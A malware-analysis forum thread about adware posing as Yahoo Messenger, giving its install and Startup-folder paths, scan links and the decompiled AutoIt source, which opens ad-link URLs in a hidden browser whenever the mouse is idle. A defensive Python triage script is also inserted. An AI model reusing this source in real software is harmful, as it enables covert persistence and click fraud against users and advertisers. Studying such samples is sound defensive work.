A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #17017  by TwinHeadedEagle
 Tue Dec 04, 2012 2:48 pm
LinkBucks.com - Get your share!

Discovered yesterday, malware very hard to notice :)

Inserts itself in these locations

C:\Program Files\Yahoo Messenger.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yahoo Messenger!.lnk


https://www.virustotal.com/file/853a6c9 ... 354578666/
http://r.virscan.org/report/641a1199ce6 ... 45220.html
http://virusscan.jotti.org/en/scanresul ... 5fb9e0d039


MBAM and ESET added it to their definitions, and it's now easy to clean :)
Password: virus
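
The two locations listed in the post above form a recognisable pair: an executable sitting directly in the Program Files root, and a Startup-folder shortcut with nearly the same name. The Python below is an added example, not code from the thread; the function names, the default install roots and the two benign entries in SAMPLE are assumptions constructed for illustration.

```python
from pathlib import PureWindowsPath

# Roots where software normally installs into a vendor subfolder, so a loose
# .exe directly inside them is worth a look. (Assumed default install roots.)
PROGRAM_ROOTS = {r"c:\program files", r"c:\program files (x86)"}
STARTUP_TAIL = r"start menu\programs\startup"

# Constructed sample: the first two paths are from the post, the rest are benign filler.
SAMPLE = [
    r"C:\Program Files\Yahoo Messenger.exe",
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yahoo Messenger!.lnk",
    r"C:\Program Files\Mozilla Firefox\firefox.exe",
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Backup Tool.lnk",
]

def name_key(path):
    """File name without extension, lower-cased, punctuation and spaces dropped."""
    return "".join(c for c in PureWindowsPath(path).stem.lower() if c.isalnum())

def triage(paths):
    """Return (rule, path) findings for the layout described in the post."""
    loose_exes, startup_links, findings = {}, {}, []
    for p in paths:
        wp = PureWindowsPath(p)
        parent, ext = str(wp.parent).lower(), wp.suffix.lower()
        if ext == ".exe" and parent in PROGRAM_ROOTS:
            loose_exes[name_key(p)] = p
            findings.append(("exe-in-program-files-root", p))
        elif ext == ".lnk" and parent.endswith(STARTUP_TAIL):
            startup_links[name_key(p)] = p
    # A Startup shortcut named like a loose executable ties the two together.
    for key, lnk in startup_links.items():
        if key in loose_exes:
            findings.append(("startup-link-matches-loose-exe", lnk))
    return findings

if __name__ == "__main__":
    for rule, path in triage(SAMPLE):
        print(f"{rule}: {path}")
```

Name matching is only a triage heuristic; resolving the shortcut's actual target would confirm the link between the two files.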
 #17028  by EP_X0FF
 Wed Dec 05, 2012 4:53 am
Code:
$test = 0
#NoTrayIcon
#Region
#AutoIt3Wrapper_Icon=ym.ico
#EndRegion
$web = "hxxp://adf.ly/2JiIW "
$web2 = "hxxp://31c3f4bd.linkbucks.com"
If $test = 1 Then
	GUICreate("", 100, 100)
	$lx = GUICtrlCreateLabel(" x ", 15, 5)
	$lt = GUICtrlCreateLabel(" t ", 15, 20)
	GUISetState()
EndIf
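If $test = 1 Then
	$t = 10
Else
	$f = 120
	$t = $f ; idle threshold in seconds
	Sleep(120000) ; wait 120 seconds after start
EndIf
; Block until a ping to google.com succeeds (network is up)
Do
	Sleep(1000)
	$p = Ping("google.com", 10000)
Until $p > 0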
website($web)
Sleep(5000)
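While 1
	$m = MouseGetPos()
	Sleep(5000)
	; Only the X coordinate is compared to detect mouse movement
	If $m[0] = MouseGetPos(0) Then
		For $x = 1 To $t
			Sleep(1000)
			label()
			If NOT ($m[0] = MouseGetPos(0)) Then
				$t = $f ; mouse moved: reset threshold
				ExitLoop
			EndIf
		Next
		label()
		; Intended to be true when the For loop ran to completion (no mouse movement for $t seconds)
		If ($x - 1) = $t Then
			$t = 1200
			website($web2)
		EndIf
	EndIf
WEnd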

Func label()
	If $test = 1 Then
		GUICtrlSetData($lx, $x)
		GUICtrlSetData($lt, $t)
	EndIf
EndFunc

Func website($web)
	If NOT (StringInStr($web, "http://") OR StringInStr($web, "https://")) Then $web = "http://" & $web
	If FileExists(@ProgramFilesDir & "\Google\Chrome\Application\chrome.exe") Then
		Run(@ProgramFilesDir & "\Google\Chrome\Application\chrome.exe " & $web, "", @SW_MINIMIZE)
	ElseIf FileExists(@ProgramFilesDir & "\Mozilla Firefox\firefox.exe") Then
		Run(@ProgramFilesDir & "\Mozilla Firefox\firefox.exe " & $web, "", @SW_MINIMIZE)
	Else
		Run(@ProgramFilesDir & "\internet explorer\iexplore.exe " & $web, "", @SW_MINIMIZE)
	EndIf
EndFunc
 #17042  by thisisu
 Wed Dec 05, 2012 11:31 pm
Comment from VT page:
Opens LinkBucks links every two minutes if mouse doesn't move
Should be this part in the code linked above:
Code:
   $f = 120
   $t = $f
   Sleep(120000)